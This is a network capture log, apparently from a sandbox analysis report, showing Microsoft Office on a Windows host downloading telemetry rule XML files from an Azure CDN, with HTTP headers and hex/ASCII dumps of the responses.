                                                                                                                                                                                                                                                                                2024-10-06 14:42:07 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:07 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:07 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 2592
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                                                                                                x-ms-request-id: 33b4d0ae-a01e-0032-35ff-161949000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144207Z-1657d5bbd48qjg85buwfdynm5w000000027g000000008se4
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:07 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                114192.168.2.65852213.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:08 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:08 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:08 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 2284
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                                                                                                x-ms-request-id: b738acd5-401e-0067-1502-1709c2000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144208Z-1657d5bbd4824mj9d6vp65b6n4000000028g00000000h3cx
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:08 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                115192.168.2.65852313.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:08 UTC191OUTGET /rules/rule90401v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:08 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:08 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1250
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDE4487AA"
                                                                                                                                                                                                                                                                                x-ms-request-id: fe430463-401e-0047-1f75-178597000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144208Z-1657d5bbd48dfrdj7px744zp8s00000001ug00000000erqy
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:08 UTC1250INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 39 30 34 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 53 61 6d 70 6c 69 6e 67 50 6f 6c 69 63 79 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 4d 65 74 61 64 61 74 61 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="90401" V="3" DC="ESM" EN="Office.Telemetry.SamplingPolicy" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" DL="A" DCa="PSP PSU" xmlns=""> <RIS> <RI N="Metadata" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                116192.168.2.65852413.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:08 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:08 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:08 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1393
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                                                                                                x-ms-request-id: 8a5fd43d-c01e-0066-4506-17a1ec000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144208Z-1657d5bbd48sdh4cyzadbb374800000001v000000000mnxg
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:08 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                117192.168.2.65852513.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:08 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:08 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:08 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1356
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                                                                                                x-ms-request-id: 0480ed94-801e-00ac-5102-17fd65000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144208Z-1657d5bbd48sqtlf1huhzuwq7000000001xg000000003yc0
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:08 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                118192.168.2.65852613.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:08 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:08 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:08 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1393
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                                                                                                x-ms-request-id: b72ef555-401e-0067-78fe-1609c2000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144208Z-1657d5bbd48xlwdx82gahegw40000000026000000000sa1w
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:08 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                119192.168.2.65852713.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:08 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:08 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:08 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1356
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                                                                                                x-ms-request-id: db28c537-d01e-0065-47fe-16b77a000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144208Z-1657d5bbd48brl8we3nu8cxwgn000000029g00000000rp5z
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:08 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                120192.168.2.65853013.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:09 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:09 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:09 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1395
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                                                                                                x-ms-request-id: b6c21a8e-c01e-008e-115a-177381000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144209Z-1657d5bbd48f7nlxc7n5fnfzh000000001u0000000005e4y
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:42:09 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                121192.168.2.65852813.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:42:09 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:42:09 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:09 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 1395
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                                                                                                x-ms-request-id: cb759915-201e-003f-5f03-176d94000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144209Z-1657d5bbd48wd55zet5pcra0cg00000001zg00000000m1vv
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
